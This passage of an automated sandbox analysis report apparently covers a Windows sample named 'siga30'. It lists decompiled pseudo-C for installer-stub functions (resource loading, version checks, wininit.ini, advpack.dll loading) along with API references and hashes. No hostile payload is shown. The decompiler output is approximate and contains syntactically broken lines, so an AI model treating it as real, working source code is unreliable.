				return E00076CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x0007681f
0x0007682a
0x00076831
0x00076836
0x0007683c
0x0007683e
0x00076848
0x00076851
0x0007685d
0x00076864
0x00076876
0x0007693a
0x0007693a
0x0007687c
0x0007687e
0x00076885
0x00000000
0x000768d6
0x000768f4
0x00076900
0x00076902
0x0007690a
0x00000000
0x0007690c
0x0007690c
0x0007691c
0x00000000
0x0007691e
0x00076924
0x0007692b
0x00076932
0x00000000
0x00000000
0x00000000
0x0007692b
0x0007691c
0x0007690a
0x00076885
0x00076876
0x00076951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0007686E
GetSystemMetrics.USER32(0000004A), ref: 000768A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000768CC
RegQueryValueExA.ADVAPI32(?,00071140,00000000,?,?,0000000C), ref: 000768F4
RegCloseKey.ADVAPI32(?), ref: 00076902

Part of subcall function 000766F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0007691A), ref: 00076741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 000768C2

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 5747d7deb858028f4d66cbb1ca0b055dae7604628286f3b2c61a85afcba5ee51
Instruction ID: c4f7114bdef31dcb6d3ca3be1f3a66289c123968edd637bd5358bb6f67da7cca
Opcode Fuzzy Hash: 5747d7deb858028f4d66cbb1ca0b055dae7604628286f3b2c61a85afcba5ee51
Instruction Fuzzy Hash: 07318231F006189FEB618B12CC04BAA77BCEB45714F0081A5EA4EA6240DB3D9D858F96

Uniqueness

Uniqueness Score: -1.00%

Function 00073A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00073A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0007468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x78d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0007468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x78d4c, "<None>") == 0) {
							LocalFree( *0x78d4c);
							L9:
							 *0x79124 = 0;
							return 1;
						}
						_t9 = E00076517(_t19, 0x7d1, 0, E00073100, 0, 0);
						LocalFree( *0x78d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x79124 = 0x800704c7;
						L2:
						return 0;
					}
					E000744B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x78d4c);
					 *0x79124 = 0x80070714;
					goto L2;
				}
				E000744B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x79124 = E00076285();
				goto L2;
			}

0x00073a46
0x00073a57
0x00073a5d
0x00073a63
0x00073a6a
0x00073a91
0x00073a9a
0x00073ad8
0x00073b13
0x00073b19
0x00073b1b
0x00000000
0x00073b21
0x00073ae7
0x00073af4
0x00073afc
0x00000000
0x00000000
0x00073afe
0x00073a87
0x00000000
0x00073a87
0x00073aa8
0x00073ab3
0x00073ab9
0x00000000
0x00073ab9
0x00073a78
0x00073a82
0x00000000

APIs

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00072F64,?,00000002,00000000), ref: 00073A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00073AB3

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 00074554

Part of subcall function 00076285: GetLastError.KERNEL32(00075BBC), ref: 00076285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00073AD0
LocalFree.KERNEL32 ref: 00073B13

Part of subcall function 00076517: FindResourceA.KERNEL32(00070000,000007D6,00000005), ref: 0007652A
Part of subcall function 00076517: LoadResource.KERNEL32(00070000,00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00076538
Part of subcall function 00076517: DialogBoxIndirectParamA.USER32(00070000,00000000,00000547,000719E0,00000000), ref: 00076557
Part of subcall function 00076517: FreeResource.KERNEL32(00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00076560

LocalFree.KERNEL32(00000000,00073100,00000000,00000000), ref: 00073AF4

Strings

<None>, xrefs: 00073AC5
LICENSE, xrefs: 00073A46

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 79b9baba2cbeaaae52088c6ff1e4fed2913ca59229bf4cffd6206b779a594fa6
Instruction ID: 7a91adec62fcefe574e2dbba0ff606d8ca8029e361837c3cd126a5e59c2ccf7a
Opcode Fuzzy Hash: 79b9baba2cbeaaae52088c6ff1e4fed2913ca59229bf4cffd6206b779a594fa6
Instruction Fuzzy Hash: 3C11A570F402416BF7345B329C09E5B3AA9EBD6710B10C42EBA4DF61A1DA7D88509669

Uniqueness

Uniqueness Score: -1.00%

Function 000724E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E000724E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x78004; // 0xa87cf02e
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0007658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00076CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x000724e0
0x000724eb
0x000724f2
0x000724f7
0x00072504
0x0007250e
0x0007251d
0x0007252c
0x00072541
0x00072546
0x00072553
0x00072555
0x00072555
0x00072546
0x0007256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00072506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0007252C
_lopen.KERNEL32 ref: 0007253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 0007254C
_lclose.KERNEL32(00000000), ref: 00072555

Strings

wininit.ini, xrefs: 00072510

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 03548fe2ea50c0c4f29abf2a5ca92d39fd692f92043ce54235caba173eea4220
Instruction ID: 5e65af9537dad787dd63399c2383df1228b177820416e49213bb5573bb236bd5
Opcode Fuzzy Hash: 03548fe2ea50c0c4f29abf2a5ca92d39fd692f92043ce54235caba173eea4220
Instruction Fuzzy Hash: 30019232F0011867D7209B659C0CEDF7BBDEB86750F004555FA4DE3190DA7C8E958AE5

Uniqueness

Uniqueness Score: -1.00%

Function 000736EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000736EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x78004; // 0xa87cf02e
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x78184 = 1;
						 *0x78180 = 1;
						L13:
						 *0x79a40 = _t119;
						L14:
						__eflags =  *0x78a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00072A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00072A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x78a38 & 0x00000001;
											if(( *0x78a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("siga30");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0007681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "siga30", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E000767C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E000728E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x79a40 = _t119;
						 *0x78184 = 1;
						 *0x78180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x79a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x78184 = _t135;
							 *0x78180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E000744B9(0, _t138);
					L66:
					return E00076CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x000736f9
0x00073700
0x0007370c
0x00073716
0x00073718
0x0007371b
0x00073721
0x0007372b
0x0007373d
0x00073745
0x00073746
0x00073746
0x00073749
0x000737ab
0x000737ad
0x000737ae
0x000737b3
0x000737b8
0x000737b8
0x000737bf
0x000737bf
0x000737c5
0x00000000
0x00000000
0x000737cb
0x000737cd
0x00000000
0x00000000
0x000737d5
0x000737db
0x000737e8
0x000737ea
0x000737ea
0x000737ea
0x000737f0
0x000737f6
0x00073805
0x00073817
0x0007382b
0x00073830
0x00073836
0x0007383b
0x0007383d
0x000738eb
0x000738eb
0x000738f2
0x0007390c
0x00073911
0x00073911
0x00073913
0x0007394d
0x0007394d
0x0007394f
0x000738a9
0x000738a9
0x000738b0
0x000738b2
0x000738b9
0x000738bb
0x000738c1
0x00073975
0x000738c7
0x000738de
0x000738e0
0x000738e0
0x0007397b
0x0007397d
0x000739a9
0x0007397f
0x00073982
0x0007398b
0x0007398d
0x0007398f
0x0007399f
0x000739a1
0x00073991
0x00073991
0x00073991
0x0007398f
0x000739af
0x000739b6
0x00073a0f
0x00073a0f
0x00073a11
0x00073a13
0x00073a19
0x00000000
0x000739b8
0x000739b8
0x000739ba
0x00000000
0x00000000
0x000739bc
0x000739bf
0x00000000
0x00000000
0x000739c3
0x000739c9
0x000739ce
0x000739d0
0x000739e3
0x000739e5
0x000739e6
0x000739f1
0x000739f7
0x000739fa
0x00073a01
0x00073a04
0x00000000
0x00000000
0x00073a06
0x00073a09
0x00073a09
0x00073a0b
0x00073a0b
0x00000000
0x00073a09
0x000739fc
0x00000000
0x000739fc
0x000739d3
0x000739d8
0x000739da
0x00000000
0x00000000
0x00000000
0x000739dc
0x000739b6
0x00073955
0x0007395b
0x00000000
0x00000000
0x00073961
0x00073963
0x00000000
0x00000000
0x00073969
0x00073969
0x00000000
0x00073969
0x00073915
0x00073915
0x0007391b
0x0007391f
0x00000000
0x00000000
0x0007392d
0x00073933
0x00073938
0x0007393a
0x00000000
0x00000000
0x00073940
0x00073946
0x0007394b
0x00000000
0x0007394b
0x00000000
0x000738f2
0x00073843
0x00073845
0x00000000
0x00000000
0x0007384b
0x0007384d
0x00073883
0x00073885
0x00000000
0x00000000
0x0007389a
0x0007389e
0x0007389e
0x00000000
0x00000000
0x000738a0
0x000738a0
0x000738a2
0x00000000
0x00000000
0x000738a4
0x00000000
0x000738a4
0x0007384f
0x00073851
0x00073857
0x0007386e
0x00073877
0x0007387b
0x00000000
0x00000000
0x00000000
0x00073881
0x00073859
0x0007385c
0x00073862
0x00073866
0x00000000
0x00000000
0x00073868
0x00000000
0x000738f4
0x000738f4
0x000738f5
0x000738fb
0x00073901
0x00073901
0x00000000
0x0007390a
0x0007374b
0x0007374e
0x0007375c
0x00073764
0x00073769
0x0007376e
0x00073771
0x0007379c
0x0007379f
0x00000000
0x00000000
0x000737a3
0x000737a4
0x00000000
0x000737a4
0x00073773
0x00073777
0x00073778
0x0007377f
0x00073781
0x0007378e
0x0007378e
0x00073794
0x00000000
0x00073794
0x00073783
0x00000000
0x00000000
0x00073785
0x0007378c
0x00000000
0x00000000
0x00000000
0x0007378c
0x00073750
0x00000000
0x0007372d
0x0007372d
0x0007396b
0x0007396b
0x0007396c
0x0007396e
0x0007396f
0x00073a1e
0x00073a1e
0x00073a22
0x00073a27
0x00073a3e
0x00073a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00073723
MessageBeep.USER32(00000000), ref: 000739C3
MessageBoxA.USER32(00000000,00000000,siga30,00000030), ref: 000739F1

Strings

3, xrefs: 00073785
siga30, xrefs: 000739E9, 00073A19

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$siga30
API String ID: 2519184315-1901119258
Opcode ID: 37517f96e2358210172ce42eb0204d46790b3f85106861720178d86f1c4b5a74
Instruction ID: dfa5a867797529e7159478074230491437bb7500883b17358f9414d24dccb853
Opcode Fuzzy Hash: 37517f96e2358210172ce42eb0204d46790b3f85106861720178d86f1c4b5a74
Instruction Fuzzy Hash: C391F5B1E012149BFBB98A14CC817EA77F0AB85300F15C0A9D94DA7251DB7D8F81EB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00076495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00076495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x78004; // 0xa87cf02e
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00071781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
				_t26 = "advpack.dll";
				E0007658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00076CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00076495
0x00076495
0x000764a0
0x000764a7
0x000764ab
0x000764bd
0x000764c2
0x000764d3
0x000764df
0x000764e8
0x00076502
0x000764ee
0x000764f9
0x000764f9
0x00076516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000764DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000764F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00076502

Strings

advpack.dll, xrefs: 000764C2, 000764CD, 00076501
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000764AC

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
API String ID: 438848745-2613218439
Opcode ID: 64da51b8c0921fc7277daf1e444c0064409827c59a5534ac33405a4bc52abdb0
Instruction ID: 46a183010113fc9e928812df1b89ddef490ab125fbb329325f8ec7f5bdaf0e12
Opcode Fuzzy Hash: 64da51b8c0921fc7277daf1e444c0064409827c59a5534ac33405a4bc52abdb0
Instruction Fuzzy Hash: F901D630E045089BEB50DB74DC49AEE7378EB91311F904195F58EA21C0DF7DAEC5CA55

Uniqueness

Uniqueness Score: -1.00%

Function 000728E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000728E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00072773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00072A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00072A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x000728f1
0x000728f4
0x000728f7
0x000728f9
0x000728fc
0x000728ff
0x00072901
0x00072907
0x00072a62
0x00072a64
0x0007290d
0x0007290d
0x0007290f
0x00072912
0x00072920
0x00072937
0x00000000
0x00000000
0x00072944
0x0007294a
0x0007294f
0x00072a2f
0x00072a32
0x00072a34
0x00072a37
0x00072a41
0x00000000
0x00000000
0x00072955
0x0007295e
0x00072962
0x00072969
0x0007296f
0x00072974
0x0007298c
0x00072a20
0x00072a21
0x00072a27
0x00072a4c
0x00072a4f
0x00072a50
0x00072a53
0x00072a56
0x00072a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x000729b2
0x000729b2
0x000729b5
0x000729bd
0x000729c3
0x000729cc
0x000729d5
0x000729d7
0x000729da
0x000729dd
0x000729df
0x000729ec
0x000729f8
0x000729fc
0x000729ff
0x00072a02
0x00072a07
0x00072a0a
0x00072a0f
0x00072a19
0x00072a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00072a0f
0x0007298c
0x00072974
0x00072962
0x00000000
0x0007294f
0x00072912
0x00072a65
0x00072a68
0x00072a6c
0x00072a6f
0x00072a6f
0x00072a7d

